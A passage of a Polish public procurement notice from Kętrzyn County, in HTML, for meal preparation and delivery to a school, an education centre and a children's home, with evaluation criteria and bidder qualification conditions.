zamówienia – weryfikacja odległości będzie prowadzona przez zastosowanie strony: https://www.viamichelin.pl/web/Trasy/<br/>…<br/>- niniejsze żądania wynikają z charakteru usługi i konieczności przygotowania, dostarczenia i wydania posiłków świeżych, o określonej temperaturze, w należytym standardzie i o wymaganej jakości celem spełnienia warunków art. 17 ust. 1 i art. 204 ust. 1 Pzp. (doświadczenie wykazywane przez Wykonawcę w związku z warunkami udziału w postępowaniu określonymi w rozdz. XIX może wynikać z wykorzystywania kuchni w innej lokalizacji niż ta organizowana na potrzeby przedmiotowego zamówienia). <br/>6. Przedmiot zamówienia zawarty jest w opisie przedmiotu zamówienia stanowiącym odpowiednio zał. nr 10b do SWZ , informacja o pomieszczeniach podlegających dzierżawie w zał. nr 11 do SWZ a warunki realizacji zamówienia zostały opisane w projektach umów, stanowiących odpowiednio zał. nr 9b do SWZ.<br/>7. Zamawiający oczekuje, że w przypadku zadania, które będzie realizowane w dzierżawionej kuchni Wykonawcy, którzy dotąd w tych kuchni nie świadczyli usług dokonają wizji lokalnej w terminie uzgodnionym indywidualnie z Odbiorcą usługi. Brak przeprowadzenia wizji nie wyklucza Wykonawcy z postępowania – stanowi jego ryzyko nierozpoznania w pełni warunków realizacji zamówienia w zakresie nie będącym jego bezpośrednim przedmiotem, ale mogącym wpływać koszt, sposób i warunki jego wykonania.<br/>Numeracja ustępów zgodna z SWZ, pełny tekst w rozdz. VI SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">55523100-3 - Usługi w zakresie posiłków szkolnych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">55520000-1 - Usługi dostarczania posiłków</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przewidują w każdej z zawieranych umów stosowanie prawa opcji - zamówienie gwarantowane to 70% wskazanego zapotrzebowania ilościowego na posiłki a opcją jest 30% wskazanego zapotrzebowania ilościowego na posiłki, z której Zamawiający skorzysta, jeśli jego działalność podstawowa będzie wymagała dalszego korzystania z oferowanych przez Wykonawcę usług.<br/>Szczegółowe informacje w szczególności dotyczące wykonania prawa opcji zawiera projekt umowy stanowiący zał. nr 9b do SWZ <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-09-02 do 2025-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1) CENA OFERTY - Ocena będzie ustalana na podstawie ceny brutto zamówienia podstawowego, podanej przez Wykonawcę na formularzu oferty. W przypadku kryterium „Cena” oferta otrzyma zaokrągloną do dwóch miejsc po przecinku liczbę punktów wynikającą z działania: C= (Cmin*100 pkt/Co) x W, <br/>gdzie: C – ocena w kryterium „cena oferty”, Cmin - „cena oferty”<br/>C - ocena jaką otrzyma oferta badania za kryterium &#34;Cena&#34;<br/>C min – cena brutto oferty najtańszej<br/>C o – cena brutto oferty ocenianej<br/>W – waga kryterium wyrażona w częściach dziesiętnych (60%=0,6)<br/>2) Organizacja przygotowywania posiłków” - Przedmiotem oceny będzie lokalizacja kuchni, którą Wykonawca będzie organizował celem przygotowywania posiłków dostarczanych odbiorcy usług w ramach niniejszego zamówienia. Wykonawcy w tym kryterium zostaną ocenieni w następujący sposób:<br/>Organizacja kuchni poza granicami adm. miasta Kętrzyna, ale w odległości nie dalszej niż 25 km od siedziby Odbiorcy usług przy ul. Poznańskiej 21 w Kętrzynie liczone zgodnie z rozdz. VI ust. 5 SWZ… - 0,00 pkt x Waga (30%) = ocena 0,00 pkt, Kuchnia w granicach adm. miasta Kętrzyna… - 100,00 pkt x Waga (30%) = ocena 30,00 pkt.<br/>3) TERMIN PŁATNOŚCI FAKTURY – Termin wskazany przez Wykonawcę w druku oferty, nie może być krótszy niż wskazany przez Zamawiającego tj. min. 7 dni. Jeżeli Wykonawca zaproponuje najdłuższy termin płatności faktury tj. 30 dni – oferta w tym zakresie zostanie uznana za najkorzystniejszą i uzyska – 100 pkt. Wykonawcy w tym kryterium zostaną ocenieni w następujący sposób:<br/>za zaoferowanie 7 dni - 0,00 pkt x Waga (10%) = ocena 0,00 pkt, za zaoferowanie 14 dni - 30,00 pkt x Waga (10%) = ocena 3,00 pkt, za zaoferowanie 21 dni - 60,00 pkt x Waga (10%) = ocena 6,00 pkt za zaoferowanie 30 dni - 100,00 pkt x Waga (10%) = ocena 10,00 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Organizacja przygotowywania posiłków</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności faktury</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiot zamówienia to świadczenie usług, niezależnie dla każdej z jednostek organizacyjnych Powiatu Kętrzyńskiego, w okresie od 02.09.2024r. do 31.08.2025r., polegających na przygotowaniu, dostarczeniu oraz wydaniu posiłków uczniom i podopiecznym korzystającym z żywienia:<br/>…<br/>3) ZADANIE III - dostarczanie obiadów do Powiatowego Domu Dziecka w Kętrzynie, od poniedziałku do piątku, tj. szacunkowo:<br/>- ok. 231 dni żywieniowych w okresie od 02.09.2024r. do 31.08.2025r., czyli szacunkowo: 1.940 obiadów RAZEM: 1.940 posiłków.<br/>…<br/>2. Wykonawcy … przygotowują, dostarczają oraz wydają posiłki korzystając z opakowań i naczyń będących w dyspozycji Wykonawcy.<br/>3. Wykonawcy zobowiązani będą do zagospodarowania odpadów pokonsumpcyjnych oraz ich utylizacji zgodnie z obowiązującymi przepisami, do zmywania oraz wyparzenia naczyń, sztućców, termosów itp. <br/>4. Wykonawca celem realizacji zamówienia zobowiązany jest do zorganizowania we własnym zakresie i na własny koszt oraz zgodnie z obowiązującymi przepisami: kuchni (z zastrzeżeniem opisanym w pkt 5), niezbędnych środków transportu, urządzeń, narzędzi i wyposażenia oraz zorganizowania i trzymania punktów przyjęcia oraz wydawania posiłków u poszczególnych Odbiorców usług.<br/>5. Wymogi dotyczące organizacji kuchni do realizacji przedmiotu zamówienia:<br/>…<br/>3) w ZADANIU III kuchnia powinna być zorganizowana w odległości nie dalszej niż 25 km od siedziby Odbiorcy usług przy ul. Klonowej 2B w Kętrzynie (liczonej po istniejących utwardzonych drogach publicznych); <br/>UWAGA: zaproponowanie kuchni w odległości dalszej niż w/w spowoduje odrzucenie oferty jako niezgodnej z warunkami zamówienia – weryfikacja odległości będzie prowadzona przez zastosowanie strony: https://www.viamichelin.pl/web/Trasy/<br/>- niniejsze żądania wynikają z charakteru usługi i konieczności przygotowania, dostarczenia i wydania posiłków świeżych, o określonej temperaturze, w należytym standardzie i o wymaganej jakości celem spełnienia warunków art. 17 ust. 1 i art. 204 ust. 1 Pzp. (doświadczenie wykazywane przez Wykonawcę w związku z warunkami udziału w postępowaniu określonymi w rozdz. XIX może wynikać z wykorzystywania kuchni w innej lokalizacji niż ta organizowana na potrzeby przedmiotowego zamówienia). <br/>6. Przedmiot zamówienia zawarty jest w opisie przedmiotu zamówienia stanowiącym odpowiednio zał. nr 10c do SWZ , informacja o pomieszczeniach podlegających dzierżawie w zał. nr 11 do SWZ a warunki realizacji zamówienia zostały opisane w projektach umów, stanowiących odpowiednio zał. nr 9c do SWZ.<br/>…<br/>8. Szczegółowe informacje w szczególności dotyczące rozliczenia zamówienia zawierają projekty umów, stanowiące odpowiednio zał. nr 9c do SWZ.<br/>Numeracja ustępów zgodna z SWZ, pełny tekst w rozdz. VI SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">55523100-3 - Usługi w zakresie posiłków szkolnych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">55520000-1 - Usługi dostarczania posiłków</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przewidują w każdej z zawieranych umów stosowanie prawa opcji - zamówienie gwarantowane to 70% wskazanego zapotrzebowania ilościowego na posiłki a opcją jest 30% wskazanego zapotrzebowania ilościowego na posiłki, z której Zamawiający skorzysta, jeśli jego działalność podstawowa będzie wymagała dalszego korzystania z oferowanych przez Wykonawcę usług.<br/>Szczegółowe informacje w szczególności dotyczące wykonania prawa opcji zawiera projekt umowy stanowiący zał. nr 9c do SWZ <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-09-02 do 2025-08-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1) CENA OFERTY - Ocena będzie ustalana na podstawie ceny brutto zamówienia podstawowego, podanej przez Wykonawcę na formularzu oferty. W przypadku kryterium „Cena” oferta otrzyma zaokrągloną do dwóch miejsc po przecinku liczbę punktów wynikającą z działania: C= (Cmin*100 pkt/Co) x W, <br/>gdzie: C – ocena w kryterium „cena oferty”, Cmin - „cena oferty”<br/>C - ocena jaką otrzyma oferta badania za kryterium &#34;Cena&#34;<br/>C min – cena brutto oferty najtańszej<br/>C o – cena brutto oferty ocenianej<br/>W – waga kryterium wyrażona w częściach dziesiętnych (60%=0,6)<br/>2) Organizacja przygotowywania posiłków” - Przedmiotem oceny będzie lokalizacja kuchni, którą Wykonawca będzie organizował celem przygotowywania posiłków dostarczanych odbiorcy usług w ramach niniejszego zamówienia. Wykonawcy w tym kryterium zostaną ocenieni w następujący sposób:<br/>Organizacja kuchni poza granicami adm. miasta Kętrzyna, ale w odległości nie dalszej niż 25 km od siedziby Odbiorcy usług przy ul. Klonowej 2B w Kętrzynie liczone zgodnie z rozdz. VI ust. 5 SWZ… - 0,00 pkt x Waga (30%) = ocena 0,00 pkt, Kuchnia w granicach adm. miasta Kętrzyna… - 100,00 pkt x Waga (30%) = ocena 30,00 pkt.<br/>3) TERMIN PŁATNOŚCI FAKTURY – Termin wskazany przez Wykonawcę w druku oferty, nie może być krótszy niż wskazany przez Zamawiającego tj. min. 7 dni. Jeżeli Wykonawca zaproponuje najdłuższy termin płatności faktury tj. 30 dni – oferta w tym zakresie zostanie uznana za najkorzystniejszą i uzyska – 100 pkt. Wykonawcy w tym kryterium zostaną ocenieni w następujący sposób:<br/>za zaoferowanie 7 dni - 0,00 pkt x Waga (10%) = ocena 0,00 pkt, za zaoferowanie 14 dni - 30,00 pkt x Waga (10%) = ocena 3,00 pkt, za zaoferowanie 21 dni - 60,00 pkt x Waga (10%) = ocena 6,00 pkt za zaoferowanie 30 dni - 100,00 pkt x Waga (10%) = ocena 10,00 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Organizacja przygotowywania posiłków</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności faktury</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> ZADANIE I – przygotowanie oraz wydanie posiłków w Zespole Szkół im. Macieja Rataja w Reszlu<br/>1) Zdolności do występowania w obrocie gospodarczym:<br/>- ZAMAWIAJĄCY NIE STAWIA SZCZEGÓŁOWEGO WARUNKU W TYM ZAKRESIE,<br/>2) Uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>- ZAMAWIAJĄCY NIE STAWIA SZCZEGÓŁOWEGO WARUNKU W TYM ZAKRESIE,<br/>3) Sytuacja ekonomiczna lub finansowa:<br/>- ZAMAWIAJĄCY NIE STAWIA SZCZEGÓŁOWEGO WARUNKU W TYM ZAKRESIE,<br/>4) Zdolność techniczna lub zawodowa:<br/>a) posiadanie niezbędnej wiedzy i doświadczenia, tj. ZAMAWIAJĄCY ŻĄDA BY WYKONAWCA wykazał, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności gospodarczej jest krótszy w tym okresie wykonywał co najmniej 1 usługę wyżywienia całodziennego, w sposób ciągły przez okres min. 9 m-cy i o wartości min. 200.000 zł. <br/>UWAGA: <br/>1) Poprzez „jedną usługę...” Zamawiający rozumie umowę (na co najmniej 2 rodzaje posiłków dziennie, w tym śniadanie (lub kolację) i obiad dwudaniowy), wykonaną na rzecz jednego Zamawiającego - nie dopuszcza się sumowania okresów realizacji umów będących wynikiem różnych zamówień celem wykazania spełnienia warunku doświadczenia. <br/>2) Wartość wskazana w warunku dotyczy zadania zrealizowanego sposób ciągły przez okres 9 miesięcy; w przypadku okresu dłuższego usługa wykonana przez Wykonawcę musi mieć wartość odpowiednio wyższą – 20.000 zł brutto na każdy kolejny miesiąc wykonania usługi wskazanej przez Wykonawcę na okoliczność spełnienia warunku udziału w postępowaniu. <br/>b) posiadanie wykwalifikowanego personelu, tj. ZAMAWIAJĄCY ŻĄDA BY WYKONAWCA wykazał dysponowanie osobami zdolnymi do wykonania zamówienia, które zostaną skierowane do jego realizacji* tj.:<br/>b) posiadanie wykwalifikowanego personelu, tj. ZAMAWIAJĄCY ŻĄDA BY WYKONAWCA wykazał dysponowanie osobami zdolnymi do wykonania zamówienia, które zostaną skierowane do jego realizacji* tj.:<br/>- kucharz - co najmniej 1 osoba, która będzie zatrudniona na etacie, wykonując pracę na stanowisku kucharza, doświadczenie minimum 1 rok pracy w zawodzie kucharza,<br/>- pomocnik kucharza - co najmniej 1 osoba, która będzie wykonywać pracę co najmniej jako pomoc kuchenna, przy przygotowywaniu posiłków lub pomocy w kuchni (nie może to być uczeń na praktyce lub stażu).<br/>UWAGA: <br/>1) Ofertę mogą składać Wykonawcy zatrudniający co najmniej dwie osoby (kucharz i pomocnik kucharza) wyłącznie na potrzeby realizacji jednego zadania będącego przedmiotem postępowania wykonujące czynności przygotowywania posiłków w kuchni dzierżawionej przez wykonawcę od odbiorcy usług (jeśli Wykonawca ubiega się o więcej niż jedno zadanie muszą być wskazane inne dla każdego z zadań: I lub/i II - pod groźbą odrzucenia oferty jako nie spełniającej warunków SWZ).<br/>2) Osoba zatrudniona na umowę o pracę (kucharz) to taka, która wykonuje czynności w sposób określony w art. 22 § 1 ustawy Kodeks pracy. Sposób zatrudnienia na umowę o pracę osób wykonujących czynności w zakresie realizacji zamówienia, okres wymaganego zatrudnienia, sposób dokumentowania zatrudnienia osób i uprawnienia Zamawiającego w zakresie kontroli spełniania przez Wykonawcę w/w wymagania, sankcje z tytułu niespełnienia tych wymagań określono w Szczegółowym Opisie Przedmiotu Zamówienia oraz projekcie umowy stanowiących załączniki do ogłoszenia. Wymóg zatrudnienia dotyczy również elementów zamówienia powierzonych przez Wykonawcę podwykonawcy i dalszym podwykonawcom.<br/><br/>ZADANIE II – dostarczanie oraz wydanie posiłków w Powiatowym Centrum Edukacyjnym <br/>w Kętrzynie<br/>1) Zdolności do występowania w obrocie gospodarczym:<br/>- ZAMAWIAJĄCY NIE STAWIA SZCZEGÓŁOWEGO WARUNKU W TYM ZAKRESIE,<br/>2) Uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>- ZAMAWIAJĄCY NIE STAWIA SZCZEGÓŁOWEGO WARUNKU W TYM ZAKRESIE,<br/>3) Sytuacja ekonomiczna lub finansowa:<br/>- ZAMAWIAJĄCY NIE STAWIA SZCZEGÓŁOWEGO WARUNKU W TYM ZAKRESIE,<br/>4) Zdolność techniczna lub zawodowa:<br/>a) posiadanie niezbędnej wiedzy i doświadczenia, tj. ZAMAWIAJĄCY ŻĄDA BY WYKONAWCA wykazał, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności gospodarczej jest krótszy w tym okresie wykonywał co najmniej 1 usługę wyżywienia całodziennego, w sposób ciągły przez okres min. 9 m-cy i o wartości min. 200.000 zł. <br/>UWAGA: <br/>1) Poprzez „jedną usługę...” Zamawiający rozumie umowę (na co najmniej 2 rodzaje posiłków dziennie, w tym śniadanie (lub kolację) i obiad dwudaniowy), wykonaną na rzecz jednego Zamawiającego - nie dopuszcza się sumowania okresów realizacji umów będących wynikiem różnych zamówień celem wykazania spełnienia warunku doświadczenia. <br/>2) Wartość wskazana w warunku dotyczy zadania zrealizowanego sposób ciągły przez okres 9 miesięcy; w przypadku okresu dłuższego usługa wykonana przez Wykonawcę musi mieć wartość odpowiednio wyższą – 20.000 zł brutto na każdy kolejny miesiąc wykonania usługi wskazanej przez Wykonawcę na okoliczność spełnienia warunku udziału w postępowaniu. <br/> b) posiadanie niezbędnych środków technicznych tj. ZAMAWIAJĄCY ŻĄDA BY WYKONAWCA wykazał dysponowanie zasobami, które zostaną skierowane/użyte do realizacji zamówienia tj.:<br/>- min. 1 środek transportowy - - samochód posiadający decyzję lub inne dokumenty Państwowej Inspekcji Sanitarnej zezwalające na przewóz w nim żywności<br/>c) posiadanie wykwalifikowanego personelu, tj. ZAMAWIAJĄCY ŻĄDA BY WYKONAWCA wykazał dysponowanie osobami zdolnymi do wykonania zamówienia, które zostaną skierowane do jego realizacji* tj.:<br/>- kucharz - co najmniej 1 osoba, która będzie zatrudniona na etacie, wykonując pracę na stanowisku kucharza, doświadczenie minimum 1 rok pracy w zawodzie kucharza,<br/>- pomocnik kucharza - co najmniej 1 osoba, która będzie wykonywać pracę co najmniej jako pomoc kuchenna, przy przygotowywaniu posiłków lub pomocy w kuchni (nie może to być uczeń na praktyce lub stażu).<br/>UWAGA: <br/>1) Ofertę mogą składać Wykonawcy zatrudniający co najmniej dwie osoby (kucharz i pomocnik kucharza) wyłącznie na potrzeby realizacji jednego zadania będącego przedmiotem postępowania wykonujące czynności przygotowywania posiłków w kuchni dzierżawionej przez wykonawcę od odbiorcy usług (jeśli Wykonawca ubiega się o więcej niż jedno zadanie muszą być wskazane inne dla każdego z zadań: I lub/i II - pod groźbą odrzucenia oferty jako nie spełniającej warunków SWZ).<br/>2) Osoba zatrudniona na umowę o pracę (kucharz) to taka, która wykonuje czynności w sposób określony w art. 22 § 1 ustawy Kodeks pracy. Sposób zatrudnienia na umowę o pracę osób wykonujących czynności w zakresie realizacji zamówienia, okres wymaganego zatrudnienia, sposób dokumentowania zatrudnienia osób i uprawnienia Zamawiającego w zakresie kontroli spełniania przez Wykonawcę w/w wymagania, sankcje z tytułu niespełnienia tych wymagań określono w Szczegółowym Opisie Przedmiotu Zamówienia oraz projekcie umowy stanowiących załączniki do ogłoszenia. Wymóg zatrudnienia dotyczy również elementów zamówienia powierzonych przez Wykonawcę podwykonawcy i dalszym podwykonawcom.<br/><br/>ZADANIE III – dostarczanie posiłków do Powiatowego Domu Dziecka w Kętrzynie<br/>1) Zdolności do występowania w obrocie gospodarczym:<br/>- ZAMAWIAJĄCY NIE STAWIA SZCZEGÓŁOWEGO WARUNKU W TYM ZAKRESIE,<br/>2) Uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>- ZAMAWIAJĄCY NIE STAWIA SZCZEGÓŁOWEGO WARUNKU W TYM ZAKRESIE,<br/>3) Sytuacja ekonomiczna lub finansowa:<br/>- ZAMAWIAJĄCY NIE STAWIA SZCZEGÓŁOWEGO WARUNKU W TYM ZAKRESIE,<br/>4) Zdolność techniczna lub zawodowa:<br/>a) posiadanie niezbędnej wiedzy i doświadczenia, tj. ZAMAWIAJĄCY ŻĄDA BY WYKONAWCA wykazał, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności gospodarczej jest krótszy w tym okresie wykonywał co najmniej 1 usługę wyżywienia, w sposób ciągły przez okres min. 9 m-cy i o wartości min. 40.000 zł. <br/>UWAGA: <br/>1) Poprzez „jedną usługę...” Zamawiający rozumie umowę (na co najmniej obiady dwudaniowe), wykonaną na rzecz jednego Zamawiającego - nie dopuszcza się sumowania okresów realizacji umów będących wynikiem różnych zamówień celem wykazania spełnienia warunku doświadczenia. <br/>2) Wartość wskazana w warunku dotyczy zadania zrealizowanego sposób ciągły przez okres 9 miesięcy; w przypadku okresu dłuższego usługa wykonana przez Wykonawcę musi mieć wartość odpowiednio wyższą – 4.000 zł brutto na każdy kolejny miesiąc wykonania usługi wskazanej przez Wykonawcę na okoliczność spełnienia warunku udziału w postępowaniu. <br/>b) posiadanie niezbędnych środków technicznych tj. ZAMAWIAJĄCY ŻĄDA BY WYKONAWCA wykazał dysponowanie zasobami, które zostaną skierowane/użyte do realizacji zamówienia tj.:<br/>- min. 1 środek transportowy - - samochód posiadający decyzję lub inne dokumenty Państwowej Inspekcji Sanitarnej zezwalające na przewóz w nim żywności<br/>3. Wyżej wymieniony, odpowiednio do Zadania, warunek udziału w postępowaniu dotyczący:<br/>1) kwalifikacji zawodowych personelu lub wiedzy i doświadczenia musi być spełniony przez:<br/>a)	przez Wykonawcę samodzielnie<br/>a w przypadku podmiotów występujących wspólnie, samodzielnie przez minimum jednego z Wykonawców wy¬stępujących wspólnie - z zastrzeżeniem: „w odniesieniu do kwalifikacji zawodowych personelu lub doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają usługę, do realizacji której te zdolności są wymagane”. Celem potwierdzenia Wykonawcy składający ofertę wspólnie są zobowiązani do oferty dołączyć oświadczenie na podstawie art. 117 ust. 4 Pzp – zał. nr 3 do SWZ;<br/>lub<br/>b)	przez podmiot udostępniający zasoby.<br/>UWAGA: <br/>1) Nie jest dopuszczalne łączenie (sumowanie) wymaganego:<br/>- doświadczenia w ramach doświadczenia różnych podmiotów wskazan...<br/>Numeracja ustępów zgodna z SWZ, pełny tekst w rozdz. XIX SWZ (pominięto w szczególności uwagi ze wzg. na ograniczenie ilości znaków w publikacji) <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">nie dotyczy</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">2) w celu potwierdzenia, że Wykonawca spełnia warunki udziału w postępowaniu (art. 273 ust. 1 pkt 2):<br/> a) Zdolności do występowania w obrocie gospodarczym: NIE DOTYCZY<br/>b) Uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: NIE DOTYCZY<br/> c) Sytuacja ekonomiczna lub finansowa: NIE DOTYCZY<br/> d) Zdolność techniczna lub zawodowa:<br/>ZADANIE I – przygotowanie oraz wydanie posiłków w Zespole Szkół im. Macieja Rataja w Reszlu ZADANIE II – dostarczanie oraz wydanie posiłków w Powiatowym Centrum Edukacyjnym w Kętrzynie<br/>ZADANIE III – dostarczanie posiłków do Powiatowego Domu Dziecka w Kętrzynie<br/>- wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających czy te lub usługi zostały wykonane lub są wykonywane należycie; w/g zał. nr 6 do SWZ.<br/>Dowodami, o których mowa w zdaniu poprzednim są:<br/>1)	referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, <br/>2)	jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; <br/>3)	jeżeli Wykonawca powołuje się na doświadczenie w realizacji usług, wykonywanych wspólnie z innymi wykonawcami, wykaz, o którym mowa wyżej ma dotyczyć usług, w których wykonaniu Wykonawca ten bezpośrednio uczestniczył, a w przypadku świadczeń powtarzających się lub ciągłych, w których wykonywaniu bezpośrednio uczestniczył lub uczestniczy.<br/>UWAGA: w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy.<br/>ZADANIE I – przygotowanie oraz wydanie posiłków w Zespole Szkół im. Macieja Rataja w Reszlu ZADANIE II – dostarczanie oraz wydanie posiłków w Powiatowym Centrum Edukacyjnym w Kętrzynie<br/>ODRĘBNIE DLA KAŻDEGO Z ZADAŃ<br/>- wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami; w/g zał. nr 7 do SWZ;<br/>ZADANIE II – dostarczanie oraz wydanie posiłków w Powiatowym Centrum Edukacyjnym <br/>w Kętrzynie<br/>ZADANIE III – dostarczanie posiłków do Powiatowego Domu Dziecka w Kętrzynie<br/>ODRĘBNIE DLA KAŻDEGO Z ZADAŃ<br/>- wykaz narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami; w/g zał. nr 8 do SWZ.<br/>e) Pouczenie:<br/>- W przypadku, gdy zamawiający jest podmiotem, na rzecz którego usługi, wskazane w wykazie usług zostały wcześniej wykonane, wykonawca nie ma obowiązku przedkładania dowodów - jeżeli wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i aktualność.<br/>- W razie konieczności, szczególnie gdy wykaz lub dowody, budzą wątpliwości zamawiającego lub gdy z poświadczenia albo z innego dokumentu wynika, że zamówienie nie zostało wykonane lub zostało wykonane nienależycie, zamawiający może zwrócić się bezpośrednio do właściwego podmiotu, na rzecz którego usługi były lub miały zostać wykonane, o przedłożenie dodatkowych informacji lub dokumentów bezpośrednio zamawiającemu.<br/>Numeracja ustępów zgodna z SWZ, pełny tekst w rozdz. XXI SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1. Do oferty należy dołączyć wypełniony przez Wykonawcę zał. nr 5 do SWZ – formularz w/s 